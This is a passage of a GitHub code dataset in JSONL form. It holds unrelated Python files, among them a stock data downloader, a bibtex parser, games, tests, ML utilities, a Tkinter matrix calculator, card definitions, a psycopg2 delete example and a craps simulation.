os.path.exists('stock_dfs/{}.csv'.format(ticker)):\n df = web.DataReader(ticker, 'yahoo', start, end)\n df.to_csv('stock_dfs/{}.csv'.format(ticker))\n print('Successfuly downloaded data for {} from {} to {}'.format(ticker, start, end))\n else:\n print('Already have {}'.format(ticker))\n\nsave_sp500_tickers()\nget_data_from_yahoo()","repo_name":"DavidStewartLDN/python-stock-tracker","sub_path":"python-finance-6.py","file_name":"python-finance-6.py","file_ext":"py","file_size_in_byte":1804,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"4923795715","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\n#This program is free software: you can redistribute it and/or modify\n#it under the terms of the GNU General Public License as published by\n#the Free Software Foundation, either version 3 of the License, or\n#(at your option) any later version.\n#\n#This program is distributed in the hope that it will be useful,\n#but WITHOUT ANY WARRANTY; without even the implied warranty of\n#MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n#GNU General Public License for more details.\n#\n#You should have received a copy of the GNU General Public License\n#along with this program. If not, see \n#\n# Author: Francois Boulogne , 2012\n\n\n\"\"\"\nFunctions using (wrapping) bibtexparser\n\"\"\"\n\nfrom ZimBibliographer.bibtexparser import BibTexParser\nimport re\n\ndef get_filedirectory(bibtex):\n \"\"\"\n Get filedirectory from the bibfile\n (jabref)\n \"\"\"\n with open(bibtex, 'r') as bibfile:\n bibtex_content = bibfile.read()\n filedirectory = re.findall('@comment{jabref-meta: fileDirectory:(.+?);}', bibtex_content, re.DOTALL)\n if filedirectory == []:\n return None\n filedirectory = re.sub('\\n', '', filedirectory[0])\n\n return filedirectory\n\n\ndef get_entries(bibtex):\n \"\"\"\n Return entries from the bibfile\n \"\"\"\n with open(bibtex, 'r') as bibfile:\n bibliography = BibTexParser(bibfile)\n\n entries = bibliography.parse()[0] \n entries_hash = {}\n for entry in entries:\n entries_hash[entry['id']] = entry\n return entries_hash\n","repo_name":"DarioGT/ZimBibliographer","sub_path":"ZimBibliographer/bibtexutils.py","file_name":"bibtexutils.py","file_ext":"py","file_size_in_byte":1583,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"31329790596","text":"import random\r\npt=0\r\nno_matches=0\r\nwhile (1):\r\n cgn = random.randint(1,9)\r\n \r\n for i in range(1,4):\r\n un = int(input('Enter Guess{} :'.format(i)))\r\n \r\n if i == 1 and un == cgn:\r\n pt+=10\r\n elif i==2 and un == cgn:\r\n pt+=6\r\n elif i==3 and un == cgn:\r\n pt+=4\r\n else:\r\n pt+=0\r\n \r\n if un>9 or un<1:\r\n print('Enter Number between 1 and 9 only')\r\n print('Number of Attempts left: ',3-i)\r\n elif un == cgn:\r\n print('Correct Guess')\r\n print('You choose {} Computer Choose {}'.format(un,cgn))\r\n break\r\n elif un > cgn:\r\n print('Guess is high')\r\n print('Number of Attempts left: ',3-i)\r\n else :\r\n print('Guess is low')\r\n print('Number of Attempts left: ',3-i)\r\n\r\n \r\n print()\r\n ch =input('Do u want to play again?').lower().strip()[0]\r\n no_matches+=1\r\n if ch == 'n':\r\n break\r\nprint()\r\nprint('Number of Matches Played: ',no_matches)\r\nprint('Points Gained: ',pt)\r\n 
\r\n","repo_name":"neel1810/Number-Guess-with-score-board","sub_path":"k2.py","file_name":"k2.py","file_ext":"py","file_size_in_byte":1117,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"6755715240","text":"from queue import Empty\n\nimport pytest\nfrom bluesky.tests.utils import DocCollector\n\nfrom bluesky_adaptive.per_start import adaptive_plan, recommender_factory\nfrom bluesky_adaptive.recommendations import SequenceRecommender\n\n\ndef test_seq_recommender(RE, hw):\n recommender = SequenceRecommender(\n [\n [\n 1,\n ],\n [\n 2,\n ],\n [\n 3,\n ],\n ]\n ) # noqa\n\n cb, queue = recommender_factory(recommender, [\"motor\"], [\"det\"])\n dc = DocCollector()\n\n # pre-poison the queue to simulate a messy reccomender\n queue.put(None)\n queue.put({})\n\n RE(\n adaptive_plan([hw.det], {hw.motor: 0}, to_recommender=cb, from_recommender=queue),\n dc.insert,\n )\n\n assert len(dc.start) == 4\n assert len(dc.event) == 4\n for ev in dc.event.values():\n assert len(ev) == 1\n\n # check that our reccomender does not leave anything behind\n with pytest.raises(Empty):\n queue.get(block=False)\n","repo_name":"bluesky/bluesky-adaptive","sub_path":"bluesky_adaptive/tests/test_per_start.py","file_name":"test_per_start.py","file_ext":"py","file_size_in_byte":1043,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"71853197866","text":"'''\nCode Challenge: Use OutputLCS (reproduced below) to solve the Longest Common Subsequence Problem.\n >>Input: Two strings s and t.\n >>Output: A longest common subsequence of s and t. (Note: more than one solution may exist, in which case you may output any one.)\n----------------\nSample Input:\nAACCTTGG\nACACTGTGA\n----------------\nSample Output:\nAACTGG\n'''\n\ndef Build_LCS_Graph(text1,text2,l1,l2):\n\timport numpy\n\tPath = numpy.zeros([l2-1,l1-1])\n\tGraph = numpy.zeros([l2,l1])\n\tfor x in range(1,l2):\n\t\tfor y in range(1,l1):\n\t\t\tif text1[y] == text2[x]:\n\t\t\t\tGraph[x][y] = max(Graph[x-1][y],Graph[x][y-1],Graph[x-1][y-1]+1)\n\t\t\telse:\n\t\t\t\tGraph[x][y] = max(Graph[x-1][y],Graph[x][y-1])\n\treturn Graph\n\ndef OutputLCS(Graph,l1,l2):\n\tx = l2-1\n\ty = l1-1\n\toutput = ''\n\twhile(x!=0 and y!=0):\n\t\tif Graph[x][y]==Graph[x-1][y]:\n\t\t\tx-=1\n\t\telif Graph[x][y]==Graph[x][y-1]:\n\t\t\ty-=1\n\t\telse:\n\t\t\toutput+=text1[y]\n\t\t\tx-=1\n\t\t\ty-=1\n\n\tprint(output[::-1])\t\t\n\nif __name__ == \"__main__\":\n\t\tfrom os.path import dirname\n\t\t\n\t\tdataset = open(dirname(__file__)+'dataset.txt').read().strip().split('\\n')\n\t\ttext1 = '0'+dataset[0]\n\t\ttext2 = '0'+dataset[1]\n\t\tl1 = len(text1)\n\t\tl2 = len(text2)\n\t\tGraph = Build_LCS_Graph(text1,text2,l1,l2)\n\t\tOutputLCS(Graph, l1, l2)","repo_name":"luoguanghao/bioinfo_algo_script","sub_path":"M3_Week1_LongestCommonSubsequence.py","file_name":"M3_Week1_LongestCommonSubsequence.py","file_ext":"py","file_size_in_byte":1234,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"24067473928","text":"#!/usr/bin/python3\n\"\"\"\n This module defines a single function\n that enables the addition of attributes\n\"\"\"\n\n\ndef add_attribute(obj, attr=\"\", value=\"\"):\n \"\"\"\n This function will add an attribute\n to the object obj if possible\n \"\"\"\n if len(dir(obj)) > 30:\n raise TypeError(\"can't add new attribute\")\n else:\n setattr(obj, attr, 
value)\n","repo_name":"awolcat/alx-higher_level_programming","sub_path":"0x0A-python-inheritance/101-add_attribute.py","file_name":"101-add_attribute.py","file_ext":"py","file_size_in_byte":378,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"27523483636","text":"from django.shortcuts import render\nfrom django.http import Http404, HttpResponseForbidden, HttpResponse, HttpResponseRedirect, JsonResponse\nfrom django.urls import reverse\nimport threading\nimport time\n\nfrom . import parser_buckwheat, parser_millet, parser_sugar\n\ndef index(request):\n buckwheat = []\n sugar = []\n millet = []\n task1 = threading.Thread(target=parser_buckwheat.parse, kwargs={'arr': buckwheat})\n task2 = threading.Thread(target=parser_sugar.parse, kwargs={'arr': sugar})\n task3 = threading.Thread(target=parser_millet.parse, kwargs={'arr': millet})\n #started_at = time.time()\n task1.start()\n task2.start()\n task3.start()\n task1.join()\n task2.join()\n task3.join()\n #print(f'Time: {time.time() - started_at}')\n return render(request, 'index.html', {'buckwheat_list': buckwheat, 'sugar_list': sugar, 'millet_list': millet})\n","repo_name":"chimchima/INT20H","sub_path":"hackathon_parser/apps/parsing/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":880,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"18284006203","text":"__env__ = '''Envs]\n Python 3.9.7 64-bit(conda 4.11.0)\n macOS 12.1\n'''\n__version__ = '''Version]\n version 0.01(beta)\n'''\n__doc__ = '''\\\nThis module contains various utilities.\n'''+ __env__+__version__\nimport tensorflow as tf\n\n\n# print tabular data\ndef print_table(col_names, *cols, tab_width=50, just='right'):\n '''Make and print a table that consists of multiple columns.\n \n The length of 'col_names' should be the same as of 'cols'.\n\n Params]\n col_names: A list of column names\n cols: Vector like 1D variables, each of which will be a column of the table sequentially\n tab_width (optional): An width of a table. default = 50\n just (optional): Justification option. 'center' and 'right' are acceptible. 
default = 'right'\n '''\n # Assume that len(col_names) == len(cols) holds.\n if len(col_names) != len(cols):\n raise ValueError('Length of col_names and cols should be same')\n # Column names\n print(\"=\"*tab_width)\n cols_str = ''.join([str(name).center(int((tab_width//len(col_names))*0.95)) \n for name in col_names])\n print(cols_str)\n print('-'*tab_width)\n \n # get the maximum length of contents, respect to each column\n max_data_len = []\n for col in cols:\n max_len = 0\n for i in range(len(col)):\n if max_len < len(str(col[i])):\n max_len = len(str(col[i]))\n max_data_len.append(max_len)\n\n # print data row by row, propotionally indented to the length of each column\n for row in range(len(cols[0])):\n # right justification\n if just =='right':\n row_str = ''.join([str(data[row]).rjust(max_data_len[i]).center(tab_width // len(cols))\n for i, data in enumerate(cols)])\n # center justification\n elif just =='center':\n row_str = ''.join([str(data[row]).center(max_data_len[i]).center(tab_width // len(cols))\n for i, data in enumerate(cols)])\n print(row_str)\n \n print('='*tab_width)\n\n# decode image file from path and resize\ndef decode_img(img, IMG_HEIGHT, IMG_WIDTH):\n img = tf.image.decode_jpeg(img, channels=3)\n img = tf.image.resize(img, [IMG_HEIGHT, IMG_WIDTH])\n img = tf.cast(img, tf.float32)\n \n return img\n\n\ndef config_for_performance(ds, batchsize=512, cache=True):\n if cache:\n if isinstance(cache, str):\n ds = ds.cache(cache)\n else:\n ds = ds.cache()\n \n AUTOTUNE = tf.data.experimental.AUTOTUNE\n ds = ds.shuffle(buffer_size=1000)\n ds = ds.repeat()\n ds = ds.batch(batchsize)\n ds = ds.prefetch(buffer_size=AUTOTUNE)\n return ds\n\n\ndef train_test_split_ds(ds, ratio=0.2):\n val_size = int(len(ds) * ratio)\n train_ds = ds.skip(val_size)\n val_ds = ds.take(val_size)\n\n return train_ds, val_ds\n\n\n\n# Get model size\n# https://stackoverflow.com/questions/43137288/how-to-determine-needed-memory-of-keras-model\ndef get_model_memory_usage(batch_size, model):\n import numpy as np\n try:\n from keras import backend as K\n except:\n from tensorflow.keras import backend as K\n\n shapes_mem_count = 0\n internal_model_mem_count = 0\n for l in model.layers:\n layer_type = l.__class__.__name__\n if layer_type == 'Model':\n internal_model_mem_count += get_model_memory_usage(batch_size, l)\n single_layer_mem = 1\n out_shape = l.output_shape\n if type(out_shape) is list:\n out_shape = out_shape[0]\n for s in out_shape:\n if s is None:\n continue\n single_layer_mem *= s\n shapes_mem_count += single_layer_mem\n\n trainable_count = np.sum([K.count_params(p) for p in model.trainable_weights])\n non_trainable_count = np.sum([K.count_params(p) for p in model.non_trainable_weights])\n\n number_size = 4.0\n if K.floatx() == 'float16':\n number_size = 2.0\n if K.floatx() == 'float64':\n number_size = 8.0\n\n total_memory = number_size * (batch_size * shapes_mem_count + trainable_count + non_trainable_count)\n gbytes = np.round(total_memory / (1024.0 ** 3), 3) + internal_model_mem_count\n return gbytes","repo_name":"three0-s/DeepWon","sub_path":"utils/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":4148,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"69854479788","text":"# Copyright 2023 DEViantUa \r\n# All rights reserved.\r\nfrom PIL import Image\r\nimport threading\r\nfrom weakref import WeakValueDictionary\r\nfrom pathlib import Path\r\n\r\nassets = Path(__file__).parent.parent / 'assets'\r\nfont = 
str(assets / 'font_hsr.ttf')\r\n\r\nmapping = {\r\n \r\n 'default': assets/'background'/'default.png',\r\n 'default_maska': assets/'background'/'default_maska.png',\r\n 'dark': assets/'background'/'dark.png',\r\n 'frame_mask': assets/'background'/'frame_mask.png',\r\n 'default_freme_line': assets/'background'/'default_freme_line.png',\r\n 'adapt_freme_line': assets/'background'/'adapt_freme_line.png',\r\n \r\n 'eidolon_open': assets/'eidolon'/'open.png',\r\n \r\n 'eidolon_electro_open': assets/'eidolon'/'electro.png',\r\n 'eidolon_fire_open': assets/'eidolon'/'fire.png',\r\n 'eidolon_ice_open': assets/'eidolon'/'ice.png',\r\n 'eidolon_imagunary_open': assets/'eidolon'/'imagunary.png',\r\n 'eidolon_physikal_open': assets/'eidolon'/'physikal.png',\r\n 'eidolon_quantom_open': assets/'eidolon'/'quantom.png',\r\n 'eidolon_wind_open': assets/'eidolon'/'wind.png',\r\n \r\n 'talants_background': assets/'talants'/'background.png',\r\n 'default_frame': assets/'talants'/'default_frame.png',\r\n 'adaptationt_frame': assets/'talants'/'adaptationt_frame.png',\r\n 'count': assets/'talants'/'count.png', \r\n \r\n 'main_stats': assets/'talants'/'main_stats.png',\r\n 'mini_stats': assets/'talants'/'mini_stats.png',\r\n 'line_stats': assets/'talants'/'line.png',\r\n \r\n \r\n 'background_up': assets/'relict'/'background_up.png',\r\n 'frame_up': assets/'relict'/'frame_up.png',\r\n 'background_centry': assets/'relict'/'background_centry.png',\r\n 'frame_centry': assets/'relict'/'frame_centry.png',\r\n 'background_down': assets/'relict'/'background_down.png',\r\n 'frame_down': assets/'relict'/'frame_down.png',\r\n 'relict_maska': assets/'relict'/'maska.png',\r\n 'relict_line': assets/'relict'/'line.png',\r\n 'count_level': assets/'relict'/'count_level.png',\r\n 'sets_count': assets/'relict'/'sets_count.png',\r\n \r\n \r\n 'shadow_3_light_cone': assets/'light_cones'/'3_shadow_lc.png',\r\n 'star_3_frame_light_cone': assets/'light_cones'/'3_star_frame_lc.png',\r\n 'shadow_4_light_cone': assets/'light_cones'/'4_shadow_lc.png',\r\n 'star_4_frame_light_cone': assets/'light_cones'/'4_star_frame_lc.png',\r\n 'shadow_5_light_cone': assets/'light_cones'/'5_shadow_lc.png',\r\n 'star_5_frame_light_cone': assets/'light_cones'/'5_star_frame_lc.png',\r\n 'blic_light_cones': assets/'light_cones'/'blic.png',\r\n 'frame_light_cones': assets/'light_cones'/'frame_lc.png',\r\n 'maska_light_cones': assets/'light_cones'/'maska_lc.png',\r\n 'stats_light_cones': assets/'light_cones'/'stats.png',\r\n \r\n \r\n 'stars_5': assets/'stars'/'stars_5.png',\r\n 'stars_4': assets/'stars'/'stars_4.png',\r\n 'stars_3': assets/'stars'/'stars_3.png',\r\n 'stars_2': assets/'stars'/'stars_2.png',\r\n 'stars_1': assets/'stars'/'stars_1.png',\r\n \r\n \r\n}\r\n\r\nclass ImageCache:\r\n def __init__(self):\r\n self.mapping = mapping\r\n self.cache = WeakValueDictionary()\r\n self.lock = threading.Lock()\r\n self.assets = assets\r\n\r\n def __dir__(self):\r\n return sorted(set([*globals(), *self.mapping]))\r\n\r\n def __getattr__(self, name):\r\n path = self.mapping.get(name)\r\n if not path:\r\n raise AttributeError(name)\r\n \r\n with self.lock:\r\n try:\r\n image = self.cache[name]\r\n except KeyError:\r\n self.cache[name] = image = Image.open(self.assets / path)\r\n \r\n return image","repo_name":"DEViantUA/HSRCard","sub_path":"hsrcard/src/tools/openfile.py","file_name":"openfile.py","file_ext":"py","file_size_in_byte":3678,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"37"} 
+{"seq_id":"34020463163","text":"from __future__ import annotations\n\nfrom l5r_auto.clans import LionClan\nfrom l5r_auto.keywords import (\n Beastmaster,\n Commander,\n Duelist,\n Experienced,\n Magistrate,\n Reserve,\n Resilient,\n Samurai,\n ScionOfStone,\n Tactician,\n Unique,\n)\nfrom l5r_auto.legality import ModernEdition, OnyxEdition, TwentyFestivalsEdition\n\nfrom ..common import Personality\n\n\"Increase Kano's Force bonuses from the rulebook Tactical Advantage action by 2 if he has a Tessen.
Battle: Give a target Battle Strategy without Discipline in your discard pile Discipline :g2:.\"\nAkodo_Kano_Master_Tactician_Experienced_2 = Personality(\n card_id=12302,\n title=\"Akodo Kano, Master Tactician\",\n force=3,\n chi=4,\n personal_honor=4,\n gold_cost=9,\n honor_requirement=12,\n clan=[LionClan],\n keywords=[Experienced(\"2\"), Tactician, Unique, Samurai],\n traits=[],\n abilities=[],\n legality=[TwentyFestivalsEdition, OnyxEdition, ModernEdition],\n)\n\"Iaijutsu Battle: Naotaka challenges a target enemy Personality. Give the winner +2F.\"\nAkodo_Naotaka = Personality(\n card_id=12303,\n title=\"Akodo Naotaka\",\n force=3,\n chi=3,\n personal_honor=3,\n gold_cost=6,\n honor_requirement=0,\n clan=[LionClan],\n keywords=[Duelist, Samurai],\n traits=[],\n abilities=[],\n legality=[TwentyFestivalsEdition, OnyxEdition, ModernEdition],\n)\n\"Toshigure has -1C while dueling Doji Moro. Toshigure has +1PH if he won a duel this turn or you are Mantis Clan.\"\nAkodo_Toshigure = Personality(\n card_id=12304,\n title=\"Akodo Toshigure\",\n force=3,\n chi=3,\n personal_honor=2,\n gold_cost=4,\n honor_requirement=7,\n clan=[LionClan],\n keywords=[Duelist, Samurai],\n traits=[],\n abilities=[],\n legality=[TwentyFestivalsEdition, OnyxEdition, ModernEdition],\n)\n\"(Once per game per card, a Resilient card does not die in battle resolution.)
Battle: Give a target enemy Personality -2F. If he is Scorpion Clan, give Kiyomako +1F.\"\nIkoma_Kiyomako = Personality(\n card_id=12305,\n title=\"Ikoma Kiyomako\",\n force=3,\n chi=2,\n personal_honor=2,\n gold_cost=5,\n honor_requirement=4,\n clan=[LionClan],\n keywords=[Resilient, Magistrate, Samurai],\n traits=[],\n abilities=[],\n legality=[TwentyFestivalsEdition, OnyxEdition, ModernEdition],\n)\n\"Compassion: Equipping Nonhuman Followers to Hideyuki is a Battle/Open for you, for 1 less gold if Hideyuki entered play this battle. (Compassion takes effect while you have fewer Provinces than anyone else.)\"\nMatsu_Hideyuki = Personality(\n card_id=12306,\n title=\"Matsu Hideyuki\",\n force=2,\n chi=2,\n personal_honor=3,\n gold_cost=4,\n honor_requirement=0,\n clan=[LionClan],\n keywords=[Reserve, Beastmaster, Commander, Samurai],\n traits=[],\n abilities=[],\n legality=[TwentyFestivalsEdition, OnyxEdition, ModernEdition],\n)\n\"You may destroy one of Kaori's unbowed Nonhuman Followers to refuse a challenge targeting her and negate all effects of refusing.
Earth Battle: Fear 2.\"\nMatsu_Kaori = Personality(\n card_id=12307,\n title=\"Matsu Kaori\",\n force=4,\n chi=2,\n personal_honor=2,\n gold_cost=7,\n honor_requirement=5,\n clan=[LionClan],\n keywords=[Beastmaster, Commander, Samurai, ScionOfStone],\n traits=[],\n abilities=[],\n legality=[TwentyFestivalsEdition, OnyxEdition, ModernEdition],\n)\n","repo_name":"aubustou/l5r","sub_path":"l5r_auto/cards/personalities/lion/thunderous_acclaim.py","file_name":"thunderous_acclaim.py","file_ext":"py","file_size_in_byte":3424,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"36412828208","text":"import xlrd, xlwt\n\n\nclass DoExcel():\n def __init__(self, file_path, sheets):\n self.file_path = file_path\n self.sheets = sheets\n\n\n def write_excel(self):\n # res, fields = excute_sql()\n # 将结果写进excel\n workbook = xlwt.Workbook()\n # 新建sheet\n for sheet in self.sheets:\n workbook.add_sheet(sheet, cell_overwrite_ok=True)\n sh = workbook.get_sheet()\n # s = workbook.add_sheet(self.sheets[1], cell_overwrite_ok=True)\n\n # 将表的字段写入excel\n # for field in range(len(fields)):\n # workbook.get_sheet()\n # sheet.write(0, field, fields[field][0])\n # # 结果写入excel\n # for row in range(1, len(res)+1):\n # for col in range(len(fields)):\n # sheet.write(row, col, res[row-1][col])\n # excel保存为文件\n workbook.save(self.file_path)\n\n\nif __name__ == '__main__':\n file_path = r'F:\\py_project\\Sort\\select_M.xls'\n sheets = ['xx001', 'xx003']\n a = DoExcel(file_path, sheets)\n a.write_excel()\n\n print('ok01')\n","repo_name":"ltt-998/my_repository","sub_path":"Sort/do_excel.py","file_name":"do_excel.py","file_ext":"py","file_size_in_byte":1101,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"32360942917","text":"#!/usr/bin/python\nimport psycopg2\nfrom config import config\n\n\"\"\"\nexecute the DELETE statement. 
If you want to pass values to the DELETE statement, you use the placeholders ( %s) in the DELETE statement and pass input values to the second parameter of the execute() method.\n\nThe DELETE statement with a placeholder for the value of the id field is as follows:\n\nDELETE FROM table_1 WHERE id = %s;\n\nTo bind value value_1 to the placeholder, you call the execute() method and pass the input value as a tuple to the second parameter like the following:\n\ncur.execute(delete_sql, (value_1,))\n\"\"\"\n\n \ndef delete_part(part_id):\n    \"\"\" delete part by part id \"\"\"\n    conn = None\n    rows_deleted = 0\n    try:\n        # read database configuration\n        params = config()\n        # connect to the PostgreSQL database\n        conn = psycopg2.connect(**params)\n        # create a new cursor\n        cur = conn.cursor()\n        # execute the DELETE statement\n        cur.execute(\"DELETE FROM parts WHERE part_id = %s\", (part_id,))\n        # get the number of deleted rows\n        rows_deleted = cur.rowcount\n        # Commit the changes to the database\n        conn.commit()\n        # Close communication with the PostgreSQL database\n        cur.close()\n    except (Exception, psycopg2.DatabaseError) as error:\n        print(error)\n    finally:\n        if conn is not None:\n            conn.close()\n    \n    return rows_deleted\n    \n    \n\nif __name__ == '__main__':\n    deleted_rows = delete_part(2)\n    print('The number of deleted rows: ', deleted_rows)\n\n\n\n\n","repo_name":"moghimis/python_postgres_tests","sub_path":"09_delete_data.py","file_name":"09_delete_data.py","file_ext":"py","file_size_in_byte":1546,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"3234413844","text":"import numpy as np\r\nimport tkinter as tk\r\nfrom tkinter import ttk\r\n\r\n \r\n\r\n#Create the instance\r\nwin=tk.Tk()\r\n\r\n\r\n#Add a title\r\nwin.title(\"MATRIX CALCULATOR\")\r\nwin.geometry(\"500x300\")\r\nwin.configure(background='dark turquoise')\r\n\r\nvar=tk.StringVar()\r\nvar1=tk.StringVar()\r\n\r\n\r\n\r\ntk.Label(win, text=\"Matrix 1\").grid(column=0, row=0)\r\n\r\nA_1_1=tk.Entry(win,width=5)\r\nA_1_1.grid(column=1, row=1)\r\n\r\nA_1_2=tk.Entry(win,width=5)\r\nA_1_2.grid(column=1, row=2)\r\n\r\nA_2_1=tk.Entry(win,width=5)\r\nA_2_1.grid(column=2, row=1)\r\n\r\nA_2_2=tk.Entry(win,width=5)\r\nA_2_2.grid(column=2, row=2)\r\n\r\ntk.Label(win, text=\"Matrix 2\").grid(column=3, row=0)\r\n\r\nB_1_1=tk.Entry(win,width=5)\r\nB_1_1.grid(column=4, row=1)\r\n\r\nB_1_2=tk.Entry(win,width=5)\r\nB_1_2.grid(column=4, row=2)\r\n\r\nB_2_1=tk.Entry(win,width=5)\r\nB_2_1.grid(column=5, row=1)\r\n\r\nB_2_2=tk.Entry(win,width=5)\r\nB_2_2.grid(column=5, row=2)\r\n\r\n#Read both 2x2 matrices from the entry widgets\r\ndef leer_matrices():\r\n    m1 = np.array([[float(A_1_1.get()), float(A_2_1.get())],\r\n                   [float(A_1_2.get()), float(A_2_2.get())]])\r\n    m2 = np.array([[float(B_1_1.get()), float(B_2_1.get())],\r\n                   [float(B_1_2.get()), float(B_2_2.get())]])\r\n    return m1, m2\r\n\r\n#Callbacks for the +, - and * buttons: show the result in the label bound to var\r\ndef llenado_matrices():\r\n    m1, m2 = leer_matrices()\r\n    var.set(str(m1 + m2))\r\n\r\ndef resta():\r\n    m1, m2 = leer_matrices()\r\n    var.set(str(m1 - m2))\r\n\r\ndef mult():\r\n    m1, m2 = leer_matrices()\r\n    var.set(str(m1 @ m2))\r\n\r\nenter=ttk.Button(win,text=\"+\", command=llenado_matrices)\r\nenter.grid(column=11, row=2)\r\n\r\nbotonresta=ttk.Button(win,text=\"-\", command=resta)\r\nbotonresta.grid(column=13, row=2)\r\n\r\nbotonmult=ttk.Button(win,text=\"*\", command=mult)\r\nbotonmult.grid(column=15, row=2)\r\n\r\nresultado=tk.Label(win, textvariable=var).grid(column=11, row=3)\r\nresultado=tk.Label(win, textvariable=var1).grid(column=11, row=5)\r\n\r\n\r\nwin.mainloop()\r\n","repo_name":"JoseRodolfo13210/CALCULADORAmatrices","sub_path":"borrador_matriz.py","file_name":"borrador_matriz.py","file_ext":"py","file_size_in_byte":1302,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"34439761629","text":"from pathlib import Path\nfrom typing import Any\nfrom typing import Callable\nfrom typing import Dict\nfrom typing import List\nfrom typing import Union\n\nimport numpy as np\nimport yaml\nfrom 
emukit.core import ParameterSpace\nfrom tqdm import tqdm\n\nfrom models import Model\n\n\ndef run_experiment(\n performance_function: Callable[[np.ndarray], np.ndarray],\n model: Model,\n parameter_space: ParameterSpace,\n save_dir: Path,\n cov_threshold: float = 0.1,\n misclassification_threshold: float = 0.02,\n n_mc: int = 5 * 10**3,\n n_doe: int = 12,\n max_iterations: int = 150,\n metric_fns: dict = None,\n true_pf: float = None,\n seed: int = None,\n) -> List[Dict[str, float]]:\n save_dir.mkdir(parents=True, exist_ok=True)\n if seed is not None:\n np.random.seed(seed)\n proposal_x = parameter_space.sample_uniform(n_mc)\n doe_idx = np.random.choice(n_mc, n_doe, replace=False)\n train_x = proposal_x[doe_idx, ...]\n proposal_x = np.delete(proposal_x, doe_idx, axis=0)\n\n metric_results: List[Dict[str, float]] = []\n\n for idx in tqdm(range(max_iterations)):\n model.train(train_x, performance_function(train_x))\n # Will repeatedly query the performance function - but this doesn't matter because only lightweight performance\n # functions are used for the experiments\n model.plot(save_dir / f\"model_idx={idx}\")\n if metric_fns is not None:\n metric_results.append({name: fn(model) for name, fn in metric_fns.items()})\n\n # compute max misclassification\n p_misclassification = model.misclassification_probability(proposal_x)\n max_misclassification = np.max(p_misclassification)\n metric_results[-1][\"Maximum predicted misclassification probability\"] = max_misclassification\n metric_results[-1][\"n training points\"] = len(train_x)\n\n all_x = np.concatenate([proposal_x, train_x])\n pf = model.failure_probability(all_x)\n sigma = np.sqrt(pf * (1 - pf) / len(all_x))\n if pf > 0:\n cov = sigma / pf\n else:\n cov = 1\n metric_results[-1][\"p_f\"] = pf\n if true_pf is not None:\n metric_results[-1][\"Failure Probability Absolute Error\"] = np.abs(pf - true_pf)\n metric_results[-1][\"CoV\"] = cov\n\n if max_misclassification < misclassification_threshold:\n if cov < cov_threshold:\n break\n else:\n new_samples = parameter_space.sample_uniform(n_mc)\n proposal_x = np.concatenate([proposal_x, new_samples])\n else:\n next_idx = np.argmax(p_misclassification)\n next_x = proposal_x[next_idx]\n proposal_x = np.delete(proposal_x, next_idx, axis=0)\n train_x = np.concatenate(\n [\n train_x,\n [\n next_x,\n ],\n ]\n )\n\n metric_results = prune_no_added_iterations(metric_results)\n\n with open(save_dir / \"results.yaml\", \"w\") as f:\n yaml.dump(convert_all_numpy_to_float(metric_results), f)\n\n return metric_results\n\n\ndef convert_all_numpy_to_float(to_convert: Any) -> Union[Dict, float, List]:\n \"\"\"Converts all types to yaml exportables by removing numpy arrays in a nested fashion\"\"\"\n if type(to_convert) == dict:\n return {key: convert_all_numpy_to_float(value) for key, value in to_convert.items()}\n elif type(to_convert) == list:\n return [convert_all_numpy_to_float(thing) for thing in to_convert]\n elif isinstance(to_convert, np.floating):\n return to_convert.item()\n elif isinstance(to_convert, np.int64):\n return to_convert.item()\n elif isinstance(to_convert, float):\n return to_convert\n elif isinstance(to_convert, int):\n return to_convert\n else:\n raise ValueError(f\"Can't convert to numpy: {to_convert} type {type(to_convert)}\")\n\n\ndef prune_no_added_iterations(metric_results: List[Dict[str, float]]) -> List[Dict[str, float]]:\n out_list = []\n for idx, item in enumerate(metric_results):\n if idx > 0 and item[\"n training points\"] == metric_results[idx - 1][\"n training 
points\"]:\n continue\n out_list.append(item)\n return out_list\n","repo_name":"fiveai/hGP_experiments","sub_path":"active_learning.py","file_name":"active_learning.py","file_ext":"py","file_size_in_byte":4265,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"37"} +{"seq_id":"40801692172","text":"from die import Die\n\nclass Player(object):\n \n def __init__(self):\n #Has a pair of dice and an empty rolls list\n self._die1 = Die()\n self._die2 = Die()\n self._rolls = []\n \n def __str__(self):\n #Returns the string rep of the history of rolls\n result = \"\"\n for (v1, v2) in self._rolls:\n result = result + str((v1, v2)) + \" \" + str(v1 + v2) + '\\n'\n return result\n\n def getNumberOfRolls(self):\n #Returns the number of the rolls in one game\n return len(self._rolls)\n\n def play(self):\n #Plays a game, saves the rolls for that game, and returns True for a win and False for a loss\n self._rolls = []\n self._die1.roll()\n self._die2.roll()\n (v1, v2) = (self._die1.getValue(),\n self._die2.getValue())\n self._rolls.append((v1, v2))\n initialSum = v1 + v2\n if initialSum in (2, 3, 12):\n return False\n elif initialSum in (7, 11):\n return True\n while True:\n self._die1.roll()\n self._die2.roll()\n (v1, v2) = (self._die1.getValue(),\n self._die2.getValue())\n self._rolls.append((v1, v2))\n sum = v1 + v2\n if sum == 7:\n return False\n elif sum == initialSum:\n return 